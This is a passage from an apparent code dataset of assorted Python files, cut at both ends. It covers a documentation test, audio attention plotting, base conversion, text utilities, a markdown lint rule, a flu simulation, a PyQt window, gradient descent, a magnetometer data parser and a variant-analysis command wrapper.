\"unitedstatesofamerica\"\n ),\n country_names,\n f\"Country class '{country_name}' is not shown correctly \"\n \"in the table.\",\n )\n\n # Make sure country alpha-2 code is shown correctly.\n self.assertIn(\n country.country,\n country_alpha_2_codes,\n f\"Country alpha-2 code '{country_alpha_2_code}' is not \"\n \"shown correctly in the table.\",\n )\n\n # Make sure country subdivisions are shown correctly.\n self.assertEqual(\n supported_countries[country_alpha_2_code],\n country_subdivisions[country_alpha_2_code],\n f\"Country class '{country_name}' subdivisions are not \"\n \"shown correctly in the table.\\n\"\n + \"\\n\".join(\n (\n f\"{c} != {s}\"\n for c, s in zip(\n supported_countries[country_alpha_2_code],\n country_subdivisions[country_alpha_2_code],\n )\n if c != s\n )\n ),\n )\n","sub_path":"tests/test_docs.py","file_name":"test_docs.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"10547490","text":"import os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim\nimport numpy as np\nimport librosa\nimport matplotlib as mpl\nmpl.use('pdf')\nimport matplotlib.pyplot as plt\n\nfrom 
sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix\n\nfrom custom_logging import get_logger\nfrom util import print_cm, get_time_stamp, pickle_load\n\nfrom data.TestDatasetManifest import TestDatasetManifest\nfrom data.WindowedMFCCFeatureExtractor import WindowedMFCCFeatureExtractor\nfrom SelfAttentionWindows._unittest_train_attwin import LSfcAttX\n\n\nplt.rc('font', family='serif', serif='Times')\nplt.rc('text', usetex=True)\nmpl.rcParams['text.latex.preamble'] = [r'\\usepackage{mathptmx}',\n r'\\usepackage[T1]{fontenc}',\n r'\\usepackage[utf8]{inputenc}',\n r'\\usepackage{pslatex}']\nplt.rc('xtick', labelsize=4)\nplt.rc('ytick', labelsize=4)\nplt.rc('axes', labelsize=6)\n\ns_logger = get_logger(__name__)\n\n\ndef sample(opt):\n torch.manual_seed(opt['seed'])\n torch.cuda.manual_seed_all(opt['seed'])\n np.random.seed(opt['seed'])\n\n device = torch.device(\"cuda\" if opt['cuda'] else 'cpu')\n\n test_manifest = TestDatasetManifest(opt, quiet=False)\n feature_extractor = pickle_load(os.path.join(opt[\"from_dir\"], \"feature_extractor.pkl\"))\n\n opt[\"sample_rate\"] = 44100\n opt[\"save_dir\"] = None\n\n model = LSfcAttX(opt)\n from_path = os.path.join(opt[\"from_dir\"], 'model_best.ckpt')\n if not os.path.exists(from_path):\n s_logger.error(\"No model checkpoint at {}!\".format(from_path))\n return\n\n model.load_state_dict(torch.load(from_path))\n\n print(model)\n model = model.to(device)\n\n actuals = []\n preds = []\n sm = torch.nn.LogSoftmax(dim=1)\n\n # Do a random subset\n num_subset = 14\n # num_subset = 4\n\n fig, axes = plt.subplots(7, 2)\n # fig, axes = plt.subplots(2, 2)\n # fig.set_size_inches(8, 11)\n # fig.subplots_adjust()\n minute = 60 * opt[\"sample_rate\"]\n seconds_per_window = int(np.floor(60. 
/ feature_extractor.windows_per_minute))\n\n clss = {0: 'NON-PROG', 1: 'PROG'}\n\n x, y = 0, 0\n with torch.no_grad():\n for i, (full_path, target) in enumerate(np.random.permutation(test_manifest.manifest)[:num_subset]):\n s_logger.info(\"Start song:\\t{}\".format(full_path))\n x_i, _ = librosa.load(full_path, sr=opt[\"sample_rate\"], mono=True)\n feat_tensor = feature_extractor.extract_feature(x_i)\n inputs = feat_tensor.float().unsqueeze(0).unsqueeze(0)\n\n seq_length = feat_tensor.size(1)\n input_percentages = torch.FloatTensor(1)\n input_percentages[0] = seq_length / float(seq_length)\n\n inputs = inputs.to(device)\n actuals.extend([target])\n\n wx, attention_weights = model(inputs, input_percentages, give_attention=True)\n attention_weights = attention_weights.squeeze(2).detach().cpu().numpy()\n probas = sm(wx)\n # probas = probas.mean(dim=1)\n\n probas = probas.detach().cpu().numpy()\n preds_i = np.argmax(probas, axis=1)\n s_logger.info(\"Pred:\\t{}\".format(preds_i[0]))\n preds.extend(list(preds_i))\n\n # Graphing\n num_minutes = int(np.ceil(float(len(x_i)) / minute))\n real_x = np.zeros(num_minutes * minute)\n\n real_x[:len(x_i)] = x_i\n idxes = np.random.permutation(np.arange(len(real_x)))[:1000 * num_minutes]\n idxes = np.asarray(np.sort(idxes))\n\n t = np.linspace(0, len(real_x) / opt[\"sample_rate\"], num=len(real_x))\n t = np.random.permutation(t)[:1000 * num_minutes]\n t = sorted(t)\n axes[y, x].plot(t, real_x[idxes])\n\n for j, x_j in enumerate(np.arange(0, num_minutes * 60, seconds_per_window)):\n end = min(x_j + seconds_per_window, num_minutes * 60)\n print(\"Window {}-{}/{}\".format(x_j, end, num_minutes * 60))\n axes[y, x].axvspan(x_j, end, color='red', alpha=float(attention_weights[0, j]), lw=0)\n\n axes[y, x].set_ylim((-1.5, 1.5))\n myouji = '/'.join(full_path.split('/')[-2:])\n myouji = myouji.replace('_', ' ')\n if len(myouji) > 27:\n myouji = myouji[:27]\n myouji = myouji + \"...\"\n title_i = \"{} - Pred: {}\".format(myouji, clss[preds_i[0]])\n axes[y, x].title.set_text(title_i)\n axes[y, x].title.set_fontsize(8)\n\n x += 1\n if x >= 2:\n x = 0\n y += 1\n # break\n\n # plt.show()\n fig.set_size_inches(7, 10)\n fig.subplots_adjust(left=0.05, right=0.97, top=0.95, bottom=0.05, hspace=0.5)\n fig.savefig('7x10-{}_{}.pdf'.format(''.join(opt[\"root_test\"].split('/')[-2:]), get_time_stamp()))\n\n # acc = accuracy_score(actuals, preds)\n # prec = precision_score(actuals, preds)\n # rec = recall_score(actuals, preds)\n # cm = confusion_matrix(actuals, preds)\n #\n # print_cm(cm, [\"nonprogR\", \"progR\"])\n # s_logger.info(\"=\\tAccuracy:\\t{}\".format(acc))\n # s_logger.info(\"=\\tPrecision:\\t{}\".format(prec))\n # s_logger.info(\"=\\tRecall:\\t{}\".format(rec))\n #\n # metrics = {'accuracy': acc, 'precision': prec, 'recall': rec, 'cm': cm}\n\n\nif __name__ == '__main__':\n opt = argparse.ArgumentParser()\n opt.add_argument('--root_test',\n required=True,\n help='Root directory of TEST MP3 files.')\n\n opt.add_argument('--from_dir',\n required=True,\n help='Directory to load checkpoint from.')\n\n opt.add_argument('--num_workers',\n default=4,\n help='Number of available threads for data loading')\n opt.add_argument('-b', '--batch_size',\n default=512,\n help='Model input batch size.')\n opt.add_argument('-s', '--seed',\n default=9,\n help='Model seed.')\n opt.add_argument('--cuda',\n action='store_true',\n default=False,\n help='Use CUDA.')\n\n opt = opt.parse_args()\n opt = vars(opt)\n\n 
sample(opt)\n","sub_path":"SelfAttentionWindows/visualize_test.py","file_name":"visualize_test.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"311870551","text":"#-*- coding:utf-8 -*-\n#问题:将整数转化为任意进制字符串\n#递归三核心:\n# 1、递归算法必须具有基本情况。当数值比进制数小的时候,可以直接输出,而且\n# 任意进制的字符串可以用\"0123456789ABCDEF\"\n# 2、递归算法必须改变其状态并向基本情况靠近。改变状态就是要把整数的数据缩小,考虑用除法,\n# 由于除法后的数比源数小,所以状态在改变,并且靠近。且余数就是可以直接获取的值。\n# 余数和除数。\n# 3、必须递归自身。\n#特点:递归时,有堆栈存储元素,把最后操作栈数据,写在了递归函数过程中。\ndef toStr(n,base):\n \"\"\"\n @n 整数\n @base 进制\n \"\"\"\n exStr = \"0123456789ABCDEF\"\n if n < base:\n return exStr[n]\n else:\n return toStr(n//base, base) + exStr[n%base]\n\n\nif __name__ == '__main__':\n result = toStr(100000000, 2)\n print(result)\n","sub_path":"code/python/数据结构/迭代/递归三核心/整数转换为任意进制字符串.py","file_name":"整数转换为任意进制字符串.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"104704907","text":"# -*- coding: utf-8 -*-\n# @Author: 何睿\n# @Create Date: 2018-09-03 10:42:26\n# @Last Modified by: 何睿\n# @Last Modified time: 2018-09-03 10:44:36\n\nimport re\nimport os\nimport codecs\nimport imghdr\nimport PIL.Image\nimport collections\nimport glob\nimport chardet\nfrom itertools import combinations\n\n# 统计英文文章的所有英文单词数\n\n\ndef calculate_english_words_in_text(filepath):\n words_count = 0\n try:\n with codecs.open(filepath, 'r', 'utf-8') as target:\n for line in target.readlines():\n words = re.findall(\"[a-zA-Z]+'*-*[a-zA-Z]*\", line)\n words_count += len(words)\n return words_count\n except IOError:\n print(\"文件读取失败,请检查文件路径\")\n\n\n# 把图片缩小至指定大小\ndef change_resoultion_to_less(pic_folder, re_w=1136, re_h=640):\n for pic_name in os.listdir(pic_folder):\n pic_path = os.path.join(pic_folder, pic_name)\n if imghdr.what(pic_path) == 'jpeg':\n with PIL.Image.open(pic_path) as target:\n w, h = target.size\n n = w / re_w if w / re_w >= h / re_h else h / re_h\n nw = int(w / n)\n nh = int(h / n)\n target.resize((nw, nh))\n target.save(pic_folder + '\\\\' + \"resize\" +\n pic_name.split('.')[0] + '.jpg', 'jpeg')\n\n\ndef not_empty(s):\n return s and s.strip()\n\n\n# 统计txt文件中的词频,file_path为文件路径,frerecy统计前%个单词\ndef count_word_frequency_in_txt(file_path, frecency):\n with codecs.open(file_path, 'r', 'utf-8') as file:\n words = []\n for line in file:\n content = re.sub(r\"\\\"|,|\\.|\\”|\\“|\\‘|\\t\", \" \", line)\n words.extend(content.strip().split(' '))\n # 去掉空字符\n res = filter(not_empty, words)\n return collections.Counter(res).most_common(int(abs(frecency)))\n\n\n# 判断文件的编码格式,参数为完整路径名,返回格式编码\ndef get_charcode(file):\n with open(file, 'rb') as f:\n content = f.read()\n return (chardet.detect(content).get('encoding'))\n\n\n# 得到父文件夹下的所有文件夹,参数为父文件夹路径,返回包含路径的set\ndef get_all_folders(directory):\n directorys = set()\n for dir_path, dir_names, file_names in os.walk(directory):\n for dir_name in dir_names:\n path = dir_path + \"\\\\\" + dir_name\n directorys.add(path)\n file_names = file_names\n return directorys\n\n\n# 得到父文件夹下指定文件类型(文件名后缀)文件的完整路径,如果没有指定,则返回所有文件的完整路径,\ndef get_all_files(directory, filetype=None):\n directorys = []\n for dir_path, dir_names, file_names in os.walk(directory):\n # 如果输入了文件类型,则按类型查找\n if filetype:\n try:\n directorys += glob.glob(dir_path + '\\\\*.' 
+ filetype)\n except Exception as e:\n print(e)\n # 如果没有输入,则返回所有的文件\n else:\n for file_name in file_names:\n path = dir_path + \"\\\\\" + file_name\n directorys.append(path)\n dir_names = dir_names\n return directorys\n\n\n# 输入文件路径,返回文件名称\ndef get_file_name(path):\n try:\n return path.split('\\\\')[len(path.split('\\\\')) - 1]\n except Exception as e:\n print(e)\n\n\n# 输入参数:string,返回参数:string\n# 功能: 去掉string中的中文字符\ndef remove_chinese_punctuation(string):\n return re.sub(\n r\"[A-Za-z0-9\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()“”:;《》?:=>【】-]+\", \"\",\n string)\n\n\n\"\"\"\n输入参数:\n keywords 需要形成组合的关键词,list类型;\n words 需要匹配的单词,list类型\n nearby_words_num 求组和的最大相邻个数,默认为15\n combination_num 每个组合的个数,默认为2\n返回格式:\n ['补偿', '风险', 2],list类型\n\"\"\"\n\n\ndef calculate_nearby_words(keywords, words, nearby_words_num=15, combination_num=2):\n # 关键词的不同组合方式\n keywords_combinations = []\n # 对关键词的组合排序\n for item in list(combinations(keywords, combination_num)):\n keywords_combinations.append(sorted(item))\n # 记录每个组合的次数,初始化为0\n times_every_combination = [0 for i in range(len(keywords_combinations))]\n son_words_one = words[0:nearby_words_num]\n son_words_two = words[nearby_words_num]\n combination_temp = []\n for item in list(combinations(son_words_one, combination_num)):\n combination_temp.append(sorted(item))\n for item in combination_temp:\n if item in keywords_combinations:\n times_every_combination[keywords_combinations.index(item)] += 1\n start_positon = 1\n for i in range(nearby_words_num, len(words)):\n son_words_one = words[start_positon:start_positon+nearby_words_num-1]\n son_words_two = words[start_positon +\n nearby_words_num-1:start_positon+nearby_words_num]\n start_positon += 1\n if son_words_two[0] in keywords:\n temp_list = [[x, y] for x in son_words_one for y in son_words_two]\n combination_temp = []\n for item in temp_list:\n combination_temp.append(sorted(item))\n for item in combination_temp:\n if item in keywords_combinations:\n times_every_combination[keywords_combinations.index(\n item)] += 1\n else:\n continue\n reslut = []\n for i in range(len(keywords_combinations)):\n if times_every_combination[i] != 0:\n keywords_combinations[i].append(times_every_combination[i])\n reslut.append(keywords_combinations[i])\n return reslut\n\n\ndef remove_last_brackets(dry):\n dry = re.sub(\" \", \"\", dry)\n length = len(dry)\n last_left_br = length - 1\n try:\n ch_last_right_br = dry.rindex(\")\")\n except:\n ch_last_right_br = -1\n try:\n en_last_right_br = dry.rindex(\")\")\n except:\n en_last_right_br = -1\n if ch_last_right_br > 0 or en_last_right_br > 0:\n last_left_br = length - 2\n return dry[:last_left_br]\n\n\ndef find_lcsubstr(s1, s2):\n \"找两个字符串的最长公共字串\"\n m = [[0 for i in range(len(s2) + 1)] for j in range(len(s1) + 1)]\n mmax = 0 # 最长匹配的长度\n p = 0 # 最长匹配对应在s1中的最后一位\n for i in range(len(s1)):\n for j in range(len(s2)):\n if s1[i] == s2[j]:\n m[i + 1][j + 1] = m[i][j] + 1\n if m[i + 1][j + 1] > mmax:\n mmax = m[i + 1][j + 1]\n p = i + 1\n return s1[p - mmax:p], mmax, p-mmax # 最长字串,长度,在串1中的起始地址\n","sub_path":"Learn/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":6965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"167492677","text":"\"\"\"\nModule to implement a plugin that looks for multiple spaces after the hash\nmark on a atx heading.\n\"\"\"\nfrom pymarkdown.markdown_token import (\n AtxHeadingMarkdownToken,\n EndMarkdownToken,\n MarkdownToken,\n TextMarkdownToken,\n)\nfrom 
pymarkdown.plugin_manager import Plugin, PluginDetails\n\n\nclass RuleMd019(Plugin):\n \"\"\"\n Class to implement a plugin that looks for multiple spaces after the hash\n mark on a atx heading.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.__in_atx_heading = None\n\n def get_details(self):\n \"\"\"\n Get the details for the plugin.\n \"\"\"\n return PluginDetails(\n # headings, headers, atx, spaces\n plugin_name=\"no-multiple-space-atx\",\n plugin_id=\"MD019\",\n plugin_enabled_by_default=True,\n plugin_description=\"Multiple spaces after hash on atx style heading\",\n ) # https://github.com/DavidAnson/markdownlint/blob/master/doc/Rules.md#md019---multiple-spaces-after-hash-on-atx-style-heading\n\n def starting_new_file(self):\n \"\"\"\n Event that the a new file to be scanned is starting.\n \"\"\"\n self.__in_atx_heading = None\n\n def next_token(self, token):\n \"\"\"\n Event that a new token is being processed.\n \"\"\"\n if isinstance(token, AtxHeadingMarkdownToken):\n self.__in_atx_heading = not token.remove_trailing_count\n elif isinstance(token, EndMarkdownToken):\n if token.type_name == MarkdownToken.token_paragraph:\n self.__in_atx_heading = False\n elif isinstance(token, TextMarkdownToken):\n if self.__in_atx_heading and len(token.extracted_whitespace) > 1:\n self.report_next_token_error(token)\n","sub_path":"pymarkdown/plugins/rule_md_019.py","file_name":"rule_md_019.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"519114628","text":"'''\nA simulation of the flu transmission model (testing a location-awareness).\n'''\n\nfrom pram.sim import Simulation\nfrom pram.entity import AttrFluStage, GroupQry, GroupSplitSpec, Site\nfrom pram.data import GroupSizeProbe\nfrom pram.rule import GotoRule, Rule, TimeInt, TimePoint\n\n\nrand_seed = 1928\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nsites = {\n 'home' : Site('home'),\n 'school-a' : Site('school-a'),\n 'school-b' : Site('school-b')\n}\n\nprobe_grp_size_flu = GroupSizeProbe.by_attr('flu', 'flu-stage', AttrFluStage, memo='Mass distribution across flu stages')\nprobe_grp_size_site = GroupSizeProbe.by_rel('site', Site.AT, sites.values(), memo='Mass distribution across sites')\n\n(Simulation(1,1,14, rand_seed=rand_seed). 
# 14-day simulation\n new_group('A', 500).\n set_attr('flu-stage', AttrFluStage.NO).\n set_rel(Site.AT, sites['home']).\n set_rel('home', sites['home']).\n set_rel('school', sites['school-a']).\n commit().\n new_group('B', 500).\n set_attr('flu-stage', AttrFluStage.NO).\n set_rel(Site.AT, sites['home']).\n set_rel('home', sites['home']).\n set_rel('school', sites['school-b']).\n commit().\n add_rule(GotoSchoolFluRule()).\n add_rule(GotoHomeFluRule()).\n add_rule(ProgressFlu02Rule()).\n # add_probe(probe_grp_size_flu).\n add_probe(probe_grp_size_site).\n # summary((False, True, False, False, False), (0,1)).\n # run(1).summary((False, True, False, False, False), (1,1)).\n # run(1).summary((False, True, False, False, False), (1,1)).\n # run(1).summary((False, True, False, False, False), (1,1)).\n # run(1).summary((False, True, False, False, False), (1,1))\n # run().summary((False, True, False, False, False), (1,1))\n run()\n)\n","sub_path":"src/sim_05_flu_transmission.py","file_name":"sim_05_flu_transmission.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"588902315","text":"\n\nimport sys\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\n\n\nclass MainWindow(QMainWindow):\n \"\"\"The main window for my application\"\"\"\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Hello world\")\n self.stacked_layout = QStackedLayout()\n self.create_initial_layout()\n self.create_hello_layout()\n self.stacked_layout.setCurrentIndex(0)\n\n self.initial_widget = QWidget()\n self.initial_widget.setLayout(self.stacked_layout)\n self.setCentralWidget(self.initial_widget)\n\n\n\n def create_initial_layout(self):\n self.label = QLabel(\"Enter your name\")\n self.text_box = QLineEdit()\n self.submit_button = QPushButton(\"submit\")\n\n\n self.layout = QVBoxLayout()\n \n self.layout.addWidget(self.label)\n self.layout.addWidget(self.text_box)\n self.layout.addWidget(self.submit_button)\n \n\n self.initial_widget = QWidget()\n self.initial_widget.setLayout(self.layout)\n\n self.stacked_layout.addWidget(self.initial_widget)\n \n #connection\n self.submit_button.clicked.connect(self.switch_layout)\n\n def create_hello_layout(self):\n self.label = QLabel()\n self.back_button = QPushButton(\"Back\")\n \n\n self.hello_layout = QVBoxLayout()\n\n self.hello_layout.addWidget(self.label)\n self.hello_layout.addWidget(self.back_button)\n\n self.hello_widget = QWidget()\n self.hello_widget.setLayout(self.hello_layout)\n self.stacked_layout.addWidget(self.hello_widget)\n\n self.back_button.clicked.connect(self.switch_back)\n\n def switch_layout(self):\n self.stacked_layout.setCurrentIndex(1)\n name = self.text_box.text()\n self.label.setText(\"Hello {0}!\".format(name))\n\n def switch_back(self):\n self.stacked_layout.setCurrentIndex(0)\n self.text_box.setText(str(\"\"))#set text_box back to nothing\n \nif __name__ == \"__main__\":\n application = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n window.raise_()\n application.exec_()\n","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"648476891","text":"import numpy as np\n\ndef cost_calc(x_train,y_train,m,c):\n cost=0\n cost=(y_train-((x_train*m)+c))**2\n # for i in range(0,len(x_train)):\n # cost=cost+((1/len(x_train))*(y_train[i]-((m*x_train)+c))**2)\n cost=cost/len(x_train)\n return 
cost.sum()\n\n\ndef step_grad(x_train,y_train,learning_rate,m,c):\n m_slope = 0\n c_slope = 0\n # for i in range(0,len(x_train)):\n # m_slope = m_slope - ((-2 / (len(x_train))) * (y_train[i]-m*x_train[i]-c))*x_train[i]\n # c_slope = c_slope - ((-2 / (len(x_train))) * (y_train[i] - m * x_train[i] - c))\n m_slope=(-2/len(x_train))*((y_train-((m*x_train)+c))*x_train)\n c_slope = (-2 / len(x_train)) * (y_train - ((m * x_train) + c))\n new_m = m - learning_rate * m_slope.sum()\n new_c = c - learning_rate * c_slope.sum()\n return new_m , new_c\n\n\ndef grad_descent(x_train,y_train,learning_rate,num_iterations):\n m=0\n c=0\n prev_cost=0\n cost=0\n for i in range(num_iterations):\n m,c=step_grad(x_train,y_train,learning_rate,m,c)\n prev_cost = cost\n cost = cost_calc(x_train, y_train, m, c)\n print(\"The cost for m:\",m,\" and c:\",c,\" is:\",cost)\n return m,c,cost\n\n\ndef loading():\n data=np.loadtxt('data.csv',delimiter=\",\")\n # print(data)\n print(data.shape)\n x=data[:,0]\n x=x.reshape(-1,1)\n y=data[:,1]\n y=y.reshape(-1,1)\n print(x.shape,y.shape)\n from sklearn import model_selection\n x_train,x_test,y_train,y_test=model_selection.train_test_split(x,y,test_size=1)\n learning_rate=0.0001\n num_iterations=10\n print(type(x_train))\n m,c,cost=grad_descent(x_train,y_train,learning_rate,num_iterations)\n print(\"Testing Data.............................\")\n m, c ,cost= grad_descent(x_test, y_test, learning_rate, num_iterations)\n\n\nloading()","sub_path":"Supervised_Learning/Regression_Techniques/Multi_Variable_ Regression_and_Gradient-Descent/f-01.py","file_name":"f-01.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"352345111","text":"import sys\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\nfrom datetime import datetime, timedelta\nfrom collections import OrderedDict, namedtuple, defaultdict\n\n\nclass Header(namedtuple('Header',\n ['Format',\n 'Source_of_Data',\n 'Station_Name',\n 'IAGA_CODE',\n 'Geodetic_Latitude',\n 'Geodetic_Longitude',\n 'Elevation',\n 'Reported',\n 'Sensor_Orientation',\n 'Digital_Sampling',\n 'Data_Interval_Type',\n 'Data_Type',\n 'Comment'])):\n pass\n\n\nHEADER_TYPES = defaultdict(lambda: str,\n [('Geodetic_Latitude', float),\n ('Geodetic_Longitude', float),\n ('Elevation', float)])\n\n\ndef convert_float(s):\n \"\"\"\n Convert the string data field *s* to a float. 
If the value is\n 99999 (missing data) or 88888 (not observed), return not a number.\n \"\"\"\n f = float(s)\n if int(f) in [99999, 88888]:\n return float('nan')\n return f\n\n\ndef parse(fname):\n \"\"\"\n Parser the IAGA2002 format file *fname* and return a tuple with a\n :class:`Header` and mapping of date/times to measured values.\n \"\"\"\n with open(fname) as fid:\n # parse header\n header_map = {}\n comment_lines = []\n for line in fid:\n if line[69] != '|' and line.rstrip()[-1] != '|':\n raise RuntimeError('malformed header line in {} ({}) --- expected | but found \"{}\"'.format(fname,\n line,\n line[69]))\n elif line[1] == '#':\n comment_lines += [line[3:69].rstrip()]\n elif line.startswith('DATE'):\n break\n else:\n key = line[:24].strip().replace(' ', '_')\n header_map[key] = HEADER_TYPES[key](line[24:69].strip())\n header_map['Comment'] = '\\n'.join(comment_lines)\n try:\n header = Header(**header_map)\n except TypeError:\n raise RuntimeError('unknown header record found in {}'.format(fname))\n # parse data header record\n fields = line[:69].split()\n if len(fields) != 7:\n raise RuntimeError('malformed data header record in {} ({})'.format(fname,\n line))\n DataRecord = namedtuple('DataRecord', ' '.join(fields[3:]))\n data_map = OrderedDict()\n # parse data records\n for line in fid:\n dt = datetime.strptime(line[:23], '%Y-%m-%d %H:%M:%S.%f')\n data1 = convert_float(line[31:40])\n data2 = convert_float(line[41:50])\n data3 = convert_float(line[51:60])\n data4 = convert_float(line[61:70])\n data_map[dt] = DataRecord(data1,\n data2,\n data3,\n data4)\n return header, data_map\n\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n\n parser = ArgumentParser('Dump a IAGA2002 format file.',\n formatter_class=ArgumentDefaultsHelpFormatter)\n parser.add_argument('iaga2002_fname',\n type=str,\n help='IAGA2002 file name')\n args = parser.parse_args(argv[1:])\n\n header, data_map = parse(args.iaga2002_fname)\n\n for key, value in header._asdict().iteritems():\n print('{} = {}'.format(key.replace(' ', '-'), value))\n for dt, values in data_map.iteritems():\n print('{:%Y-%m-%d %H:%M:%S.%f}: {} {} {} {}'.format(dt,\n values[1],\n values[2],\n values[3],\n values[4]))\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n sys.exit(main())\n","sub_path":"mag/iaga2002.py","file_name":"iaga2002.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"60232753","text":"#!/usr/bin/env python\n# Copyright (c) 2015, Di Zhang \n\nimport os, sys\nimport variant_tools.project as project\nimport variant_tools.importer as importer\nimport variant_tools.exporter as exporter\nimport variant_tools.update as update\nimport variant_tools.variant as variant\nimport variant_tools.compare as compare\nimport variant_tools.association as association\nimport variant_tools.pipeline as pipeline\nimport variant_tools.phenotype as phenotype\nimport variant_tools.annotation as annotation\nfrom time import sleep\n\nclass Args:\n def __init__(self):\n self.verbosity = 1\n self.unknown_args = []\n def Manifest(self):\n for k, v in vars(self).items():\n sys.stderr.write('{}: {}\\n'.format(k, v))\n \nclass Init(Args):\n def __init__(self, Project='test', Build='hg19', Force=False):\n Args.__init__(self)\n self.project = Project\n self.build = Build\n self.force = Force\n self.parent = False\n self.children = False\n \n def Run(self):\n #self.Manifest()\n project.init(self)\n sleep(0) #sleep 3 
seconds\n\nclass Import(Args):\n def __init__(self, Input_files=[], Format='', Build='hg19', Sample_name=[], Force=False, Jobs=1):\n Args.__init__(self)\n self.input_files = Input_files\n self.build = Build\n self.format = Format\n self.sample_name = Sample_name\n self.force = Force\n self.jobs = Jobs\n\n def Run(self):\n #self.Manifest()\n importer.importVariants(self)\n sleep(0) #sleep 3 seconds\n\nclass Update(Args):\n def __init__(self, Table='variant', From_file=[], Format='', Sample_name=[], Jobs=1, Set=[], From_stat=[], Samples=[], Genotypes=[], Build='hg19'):\n Args.__init__(self)\n self.table = Table\n self.from_file = From_file\n self.format = Format\n self.jobs = Jobs\n self.sample_name =Sample_name\n self.set = Set\n self.from_stat = From_stat\n self.samples = Samples\n self.genotypes = Genotypes\n self.build= Build\n\n def Run(self):\n #if self.from_file == '' and self.from_stat == []:\n # sys.stderr('Must choose a way to update: From_file or From_stat\\n')\n # return\n #self.Manifest()\n update.update(self)\n sleep(0) #sleep 3 seconds\n\nclass Phenotype(Args):\n def __init__(self, From_file=None, Set=[], From_stat=[], Output=[], Jobs=1, Genotypes=[], Samples=[], Header=None, Delimiter='\\t', Na='NA', Limit=-1):\n Args.__init__(self)\n self.from_file = From_file\n self.output = Output\n self.jobs = Jobs\n self.set = Set\n self.from_stat = From_stat\n self.samples = Samples\n self.genotypes = Genotypes\n self.header = Header\n self.delimiter = Delimiter\n self.na = Na\n self.limit = Limit\n\n def Run(self):\n #if self.from_file == '' and self.from_stat == []:\n # sys.stderr('Must choose a way to update: From_file or From_stat\\n')\n # return\n #self.Manifest()\n phenotype.phenotype(self)\n sleep(0) #sleep 3 seconds\n\nclass Use(Args):\n def __init__(self, Source='', As=None, Linked_by=[], Anno_type=None, Linked_fields=None, Files=[], Rebuild=False, Jobs=1):\n Args.__init__(self)\n self.source = Source\n setattr(self, 'as', As) #hack ...\n self.linked_by = Linked_by\n self.anno_type = Anno_type\n self.linked_fields = Linked_fields\n self.files = Files\n self.rebuild = Rebuild\n self.jobs = Jobs\n\n def Run(self):\n #self.Manifest()\n annotation.use(self)\n sleep(0) #sleep 3 seconds\n \nclass Compare(Args):\n def __init__(self, Tables=[], Union=[], Intersection=[], Difference=[], Expression=[], Mode=None, Samples=[], Count=False, A_diff_B=[], B_diff_A=[], A_and_B=[], A_or_B=[]):\n Args.__init__(self)\n self.tables = Tables\n self.union = Union\n self.intersection = Intersection\n self.difference = Difference\n self.expression = Expression\n self.mode = Mode\n self.samples = Samples\n self.count = Count\n self.A_diff_B = A_diff_B\n self.B_diff_A = B_diff_A\n self.A_and_B = A_and_B\n self.A_or_B = A_or_B\n\n def Run(self):\n #self.Manifest()\n compare.compare(self)\n sleep(0) #sleep 3 seconds\n\nclass Associate(Args):\n def __init__(self, Variants='', Phenotypes=[], Covariates=[], Var_info=[], Geno_info=[], Geno_name='GT', Methods=[], Group_by=[], Samples=[], Genotypes=[], Discard_samples=[], Discard_variants=[], To_db='', Delimiter=None, Force=False, Jobs=1, Unknown_args=[]):\n Args.__init__(self)\n self.variants = Variants\n self.phenotypes = Phenotypes\n self.covariates = Covariates\n self.var_info = Var_info\n self.geno_info = Geno_info\n self.geno_name = Geno_name\n self.methods =Methods\n self.group_by = Group_by\n self.samples = Samples\n self.genotypes = Genotypes\n self.discard_samples = Discard_samples\n self.discard_variants = Discard_variants\n self.to_db = To_db\n 
self.delimiter = Delimiter\n self.force = Force\n self.jobs = Jobs\n self.unknown_args = Unknown_args\n\n def Run(self):\n #self.Manifest()\n association.associate(self)\n sleep(3) #sleep 3 seconds\n\nclass GeneralOutput(Args):\n def __init__(self, Header=[], Delimiter=None, Na='.', Limit=None, Build='hg19', Group_by=[], All=False, Order_by=[]):\n Args.__init__(self)\n self.header = Header\n self.delimiter = Delimiter\n self.na = Na\n self.limit = Limit\n self.build = Build\n self.group_by = Group_by\n self.all = All\n self.order_by = Order_by\n \nclass Select(GeneralOutput):\n def __init__(self, From_table='', Condition=[], Samples=[], To_table=[], Count=False, Output=[], *args, **kwargs):\n GeneralOutput.__init__(self, *args, **kwargs)\n self.from_table = From_table\n self.condition = Condition\n self.samples = Samples\n self.to_table = To_table\n self.count = Count\n self.output = Output\n\n def Run(self):\n #self.Manifest()\n variant.select(self)\n sleep(0) #sleep 3 seconds\n\nclass Exclude(Select):\n def Run(self):\n #self.Manifest()\n variant.select(self, 